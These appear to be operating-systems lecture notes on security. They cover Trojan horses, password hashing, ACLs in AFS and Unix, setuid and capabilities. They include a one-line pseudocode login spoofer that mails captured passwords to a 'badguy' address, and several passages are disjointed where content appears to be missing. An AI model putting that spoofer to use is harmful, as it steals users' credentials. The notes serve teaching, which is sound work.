The terms protection and security are often used together, and the distinction between them is a bit blurred, but security is generally used in a broad sense to refer to all concerns about controlled access to facilities, while protection describes specific technological mechanisms that support security.
As in any other area of software design, it is important to distinguish between policies and mechanisms. Before you can start building machinery to enforce policies, you need to establish what policies you are trying to enforce. Many years ago, I heard a story about a software firm that was hired by a small savings and loan corporation to build a financial accounting system. The chief financial officer used the system to embezzle millions of dollars and fled the country. The losses were so great the S&L went bankrupt, and the loss of the contract was so bad the software company also went belly-up. Did the accounting system have a good or bad security design? The problem wasn't unauthorized access to information, but rather authorization to the wrong person. The situation is analogous to the old saw that every program is correct according to some specification. Unfortunately, we don't have the space here to go into the whole question of security policies here. We will just assume that terms like “authorized access” have some well-defined meaning in a particular context.
In response to these threats counter measures also fall into various categories. As programmers, we tend to think of technological tricks, but it is also important to realize that a complete security design must involve physical components (such as locking the computer in a secure building with armed guards outside) and human components (such as a background check to make sure your CFO isn't a crook, or checking to make sure those armed guards aren't taking bribes).
Break-in techniques come in numerous forms. One general category of attack that comes in a great variety of disguises is the Trojan Horse scam. The name comes from Greek mythology. The ancient Greeks were attacking the city of Troy, which was surrounded by an impenetrable wall. Unable to get in, they left a huge wooden horse outside the gates as a “gift” and pretended to sail away. The Trojans brought the horse into the city, where they discovered that the horse was filled with Greek soldiers who defeated the Trojans to win the Rose Bowl (oops, wrong story). In software, a Trojan Horse is a program that does something useful--or at least appears to do something useful--but also subverts security somehow. In the personal computer world, Trojan horses are often computer games infected with “viruses.”
Here's the simplest Trojan Horse program I know of. Log onto a public terminal and start a program that does something like this:
print("login:"); name = readALine(); turnOffEchoing(); print("password:"); passwd = readALine(); sendMail("badguy",name,passwd); print("login incorrect"); exit();A user waking up to the terminal will think it is idle. He will attempt to log in, typing his login name and password. The Trojan Horse program sends this information to the bad guy, prints the message login incorrect and exits. After the program exits, the system will generate a legitimate login: message and the user, thinking he mistyped his password (a common occurrence because the password is not echoed) will try again, log in successfully, and have no suspicion that anything was wrong. Note that the Trojan Horse program doesn't actually have to do anything useful, it just has to appear to.
Authentication is a process by which one party convinces another of its identity. A familiar instance is the login process, though which a human user convinces the computer system that he has the right to use a particular account. If the login is successful, the system creates a process and associates with it the internal identifier that identifies the account. Authentication occurs in other contexts, and it isn't always a human being that is being authenticated. Sometimes a process needs to authenticate itself to another process. In a networking environment, a computer may need to authenticate itself to another computer. In general, let's call the party that whats to be authenticated the client and the other party the server.
One common technique for authentication is the use of a password. This is the technique used most often for login. There is a value, called the password that is known to both the server and to legitimate clients. The client tells the server who he claims to be and supplies the password as proof. The server compares the supplied password with what he knows to be the true password for that user.
Although this is a common technique, it is not a very good one. There are lots of things wrong with it.
The most obvious way of breaking in is a frontal assault on the password. Simply try all possible passwords until one works. The main defense against this attack is the time it takes to try lots of possibilities. If the client is a computer program (perhaps masquerading as a human being), it can try lots of combinations very quickly, but by if the password is long enough, even the fastest computer cannot try succeed in a reasonable amount of time. If the password is a string of 8 letters and digits, there are 2,821,109,907,456 possibilities. A program that tried one combination every millisecond would take 89 years to get through them all. If users are allowed to pick their own passwords, they are likely to choose “cute doggie names”, common words, names of family members, etc. That cuts down the search space considerably. A password cracker can go through dictionaries, lists of common names, etc. It can also use biographical information about the user to narrow the search space. There are several defenses against this sort of attack.
This is a far bigger program for passwords than brute force attacks. In comes in many disguises.
Unix introduced a clever fix to this problem, that has since been almost universally copied. Use some hash function f and instead of storing password, store f(password). The hash function should have two properties: Like any hash function it should generate all possible result values with roughly equal probability, and in addition, it should be very hard to invert--that is, given f(password), it should be hard to recover password. It is quite easy to devise functions with these properties. When a client sends his password, the server applies f to it and compares the result with the value stored in the password file. Since only f(password) is stored in the password file, nobody can find out the password for a given user, even with full access to the password file, and logging in requires knowing password, not f(password). In fact, this technique is so secure, it has become customary to make the password file publicly readable!
This is the worst threat of all.
How does the client know that the server is who it appears to be?
If the bad guy can pose as the server, he can trick the client into
divulging his password.
We saw a form of this attack above.
It would seem that the server needs to authenticate itself to the client
before the client can authenticate itself to the server.
Clearly, there's a chicken-and-egg problem here.
Fortunately, there's a very clever and general solution to this problem.
Challenge-response.
There are wide variety of authentication protocols, but they are all based on a simple idea. As before, we assume that there is a password known to both the (true) client and the (true) server. Authentication is a four-step process.
First, some terminology:
access[solomon]["/tmp/foo"] = { read, write }Then I have read and write access to file "/tmp/foo". I say “conceptually” because the access is never actually stored anywhere. It is very large and has a great deal of redundancy (for example, my rights to a vast number of objects are exactly the same: none!), so there are much more compact ways to represent it. The access information is represented in one of two ways, by columns, which are called access control lists (ACLs), and by rows, called capability lists.
An ACL (pronounced “ackle”) is a list of rights associated with an object. A good example of the use of ACLs is the Andrew File System (AFS) originally created at Carnegie-Mellon University and now marketed by Transarc Corporation as an add-on to Unix. This file system is widely used in the Computer Sciences Department. Your home directory is in AFS. AFS associates an ACL with each directory, but the ACL also defines the rights for all the files in the directory (in effect, they all share the same ACL). You can list the ACL of a directory with the fs listacl command:
% fs listacl /u/c/s/cs537-1/public Access list for /u/c/s/cs537-1/public is Normal rights: system:administrators rlidwka system:anyuser rl solomon rlidwkaThe entry system:anyuser rl means that the principal system:anyuser (which represents the role “anybody at all”) has rights r (read files in the directory) and l (list the files in the directory and read their attributes). The entry solomon rlidwka means that I have all seven rights supported by AFS. In addition to r and l, they include the rights to insert new file in the the directory (i.e., create files), delete files, write files, lock files, and administer the ACL list itself. This last right is very powerful: It allows me to add, delete, or modify ACL entries. I thus have the power to grant or deny any rights to this directory to anybody. The remaining entry in the list shows that the principal system:administrators has the same rights I do (namely, all rights). This principal is the name of a group of other principals. The command pts membership system:administrators lists the members of the group.
Ordinary Unix also uses an ACL scheme to control access to files, but in a much stripped-down form. Each process is associated with a user identifier (uid) and a group identifier (gid), each of which is a 16-bit unsigned integer. The inode of each file also contains a uid and a gid, as well as a nine-bit protection mask, called the mode of the file. The mask is composed of three groups of three bits. The first group indicates the rights of the owner: one bit each for read access, write access, and execute access (the right to run the file as a program). The second group similarly lists the rights of the file's group, and the remaining three three bits indicate the rights of everybody else. For example, the mode 111 101 101 (0755 in octal) means that the owner can read, write, and execute the file, while members of the owning group and others can read and execute, but not write the file. Programs that print the mode usually use the characters rwx- rather than 0 and 1. Each zero in the binary value is represented by a dash, and each 1 is represented by r, w, or x, depending on its position. For example, the mode 111101101 is printed as rwxr-xr-x.
In somewhat more detail, the access-checking algorithm is as follows: The first three bits are checked to determine whether an operation is allowed if the uid of the file matches the uid of the process trying to access it. Otherwise, if the gid of the file matches the gid of the process, the second three bits are checked. If neither of the id's match, the last three bits are used. The code might look something like this.
boolean accessOK(Process p, Inode i, int operation) { int mode; if (p.uid == i.uid) mode = i.mode >> 6; else if (p.gid == i.gid) mode = i.mode >> 3; else mode = i.mode; switch (operation) { case READ: mode &= 4; break; case WRITE: mode &= 2; break; case EXECUTE: mode &= 1; break; } return (mode != 0); }(The expression i.mode >> 3 denotes the value i.mode shifted right by three bits positions and the operation mode &= 4 clears all but the third bit from the right of mode.) Note that this scheme can actually give a random user more powers over the file than its owner. For example, the mode ---r--rw- (000 100 110 in binary) means that the owner cannot access the file at all, while members of the group can only read the file, and other can both read and write. On the other hand, the owner of the file (and only the owner) can execute the chmod system call, which changes the mode bits to any desired value. When a new file is created, it gets the uid and gid of the process that created it, and a mode supplied as an argument to the creat system call.
Most modern versions of Unix actually implement a slightly more flexible scheme for groups. A process has a set of gid's, and the check to see whether the file is in the process' group checks to see whether any of the process' gid's match the file's gid.
boolean accessOK(Process p, Inode i, int operation) { int mode; if (p.uid == i.uid) mode = i.mode >> 6; else if (p.gidSet.contains(i.gid)) mode = i.mode >> 3; else mode = i.mode; switch (operation) { case READ: mode &= 4; break; case WRITE: mode &= 2; break; case EXECUTE: mode &= 1; break; } return (mode != 0); }When a new file is created, it gets the uid of the process that created it and the gid of the containing directory. There are system calls to change the uid or gid of a file. For obvious security reasons, these operations are highly restricted. Some versions of Unix only allow the owner of the file to change it gid, only allow him to change it to one of his gid's, and don't allow him to change the uid at all.
For directories, “execute” permission is interpreted as the right to get the attributes of files in the directory. Write permission is required to create or delete files in the directory. This rule leads to the surprising result that you might not have permission to modify a file, yet be able to delete it and replace it with another file of the same name but with different contents!
Unix has another very clever feature--so clever that it is patented! The file mode actually has a few more bits that I have not mentioned. One of them is the so-called setuid bit. If a process executes a program stored in a file with the setuid bit set, the uid of the process is set equal to the uid of the file. This rather curious rule turns out to be a very powerful feature, allowing the simple rwx permissions directly supported by Unix to be used to define arbitrarily complicated protection policies.
As an example, suppose you wanted to implement a mail system that works by putting all mail messages in to one big file, say /usr/spool/mbox. I should be able to read only those message that mention me in the To: or Cc: fields of the header. Here's how to use the setuid feature to implement this policy. Define a new uid mail, make it the owner of /usr/spool/mbox, and set the mode of the file to rw------- (i.e., the owner mail can read and write the file, but nobody else has any access to it). Write a program for reading mail, say /usr/bin/readmail. This file is also owned by mail and has mode srwxr-xr-x. The ‘s’ means that the setuid bit is set. My process can execute this program (because the “execute by anybody” bit is on), and when it does, it suddenly changes its uid to mail so that it has complete access to /usr/spool/mbox. At first glance, it would seem that letting my process pretend to be owned by another user would be a big security hole, but it isn't, because processes don't have free will. They can only do what the program tells them to do. While my process is running readmail, it is following instructions written by the designer of the mail system, so it is safe to let it have access appropriate to the mail system. There's one more feature that helps readmail do its job. A process really has two uid's, called the effective uid and the real uid. When a process executes a setuid program, its effective uid changes to the uid of the program, but its real uid remains unchanged. It is the effective uid that is used to determine what rights it has to what files, but there is a system call to find out the real uid of the current process. Readmail can use this system call to find out what user called it, and then only show the appropriate messages.
An alternative to ACLs are capabilities. A capability is a “protected pointer” to an object. It designates an object and also contains a set of permitted operations on the object. For example, one capability may permit reading from a particular file, while another allows both reading and writing. To perform an operation on an object, a process makes a system call, presenting a capability that points to the object and permits the desired operation. For capabilities to work as a protection mechanism, the system has to ensure that processes cannot mess with their contents. There are three distinct ways to ensure the integrity of a capability.